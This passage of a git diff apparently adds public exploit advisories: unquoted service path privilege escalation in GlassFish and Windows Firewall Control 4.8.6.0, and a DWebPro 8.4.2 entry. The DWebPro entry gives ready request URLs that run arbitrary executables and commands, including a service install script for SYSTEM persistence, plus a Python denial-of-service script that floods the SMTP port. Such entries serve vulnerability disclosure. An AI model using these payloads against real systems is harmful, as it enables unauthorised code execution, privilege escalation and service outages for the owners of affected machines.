DISPLAY_NAME : domain1 GlassFish Server + DEPENDENCIES : tcpip + SERVICE_START_NAME : LocalSystem + +3. Exploit: + +A successful attempt would require the local user to be able to insert their +code in the system path undetected by the OS or other security applications +where it could potentially be executed during application startup or reboot. +If successful, the local user's code would execute with the elevated privileges +of the application. diff --git a/platforms/windows/local/40443.txt b/platforms/windows/local/40443.txt new file mode 100755 index 000000000..bc15dfede --- /dev/null +++ b/platforms/windows/local/40443.txt @@ -0,0 +1,27 @@ +# Exploit Title: Windows Firewall Control Unquoted Service Path Privilege Escalation +# Date: 24/09/2016 +# Exploit Author: zaeek@protonmail.com +# Vendor Homepage: http://www.binisoft.org +# Version: 4.8.6.0 +# Tested on: Windows 7 32/64bit + +====Description==== + +Windows Firewall Control lacks of the quotes in filepath, causing it to be a potential vector of privilege escalation attack. +To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. + +====Proof-of-Concept==== + +C:\\Users\\testusr>sc qc _wfcs +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: _wfcs +TYPE : 10 WIN32_OWN_PROCESS +START_TYPE : 2 AUTO_START +ERROR_CONTROL : 1 NORMAL +BINARY_PATH_NAME : C:\\Program Files\\Windows Firewall Control\\wfcs.exe +LOAD_ORDER_GROUP : +TAG : 0 +DISPLAY_NAME : Windows Firewall Control +DEPENDENCIES : MpsSvc +SERVICE_START_NAME : LocalSystem \ No newline at end of file diff --git a/platforms/windows/remote/40445.txt b/platforms/windows/remote/40445.txt new file mode 100755 index 000000000..57e7d5f36 --- /dev/null +++ b/platforms/windows/remote/40445.txt @@ -0,0 +1,53 @@ +# Exploit Title: DWebPro 8.4.2 Remote Binary Execution +# Date: 01/10/2016 +# Exploit Author: Tulpa +# Contact: tulpa@tulpa-security.com +# Author website: www.tulpa-security.com +# Author twitter: @tulpa_security +# Vendor Homepage: http://www.dwebpro.com/ +# Software Link: http://www.dwebpro.com/download +# Version: 8.4.2 +# Tested on: Windows 7 x86 +# Shout-out to carbonated and ozzie_offsec + +1. Description: + +DWebPro is a software package used for used for distributing dynamical web sites on CD/DVD or USB drives. It +includes it's own web server called "primary web server" as well as an SMTP server. The POC below relates to the +installation of DWebPro itself however it is conceivable that the vulnerability could be leveraged within certain +contexts from a CD/DVD or USB drive. Dependent on the client configuration this vulnerability could be exploited +remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DOS attacks. + +2. Remote Binary Execution and Local File Inclusion Proof of Concept + +When browsing to the demo site installed with DWebPro you will find hyperlinks to various resources located on the +local machine. One such example is "http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english +\dwebpro.chm". Any file can be accessed on the vulnerable machine by simply replacing the start?file= location. It +is important to note however that when browsing to an executable file through this vulnerability, that the web server +will indeed run the application locally instead of prompting you for a download. As an example, the following will start the +calculator process on the victim machine "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe". +Calc.exe will by default execute with the same permission as the user who ran dwepro.exe initially. + +Basic cmd commands can also be executed such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig". + +These privileges can be escalated to SYSTEM however by installing the application as a windows service which will +automatically run on start up. In order to initiate that installation, the attacker could take advantage of a script +which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using +"http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat". + +3. Denial of Service Proof of Concept + +#!/usr/bin/python + +import socket +import sys + +s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) +connect=s.connect(('192.168.0.1',25)) + +evil = 'A' * 300 +s.recv(1024) +s.send(evil) + +s.close() +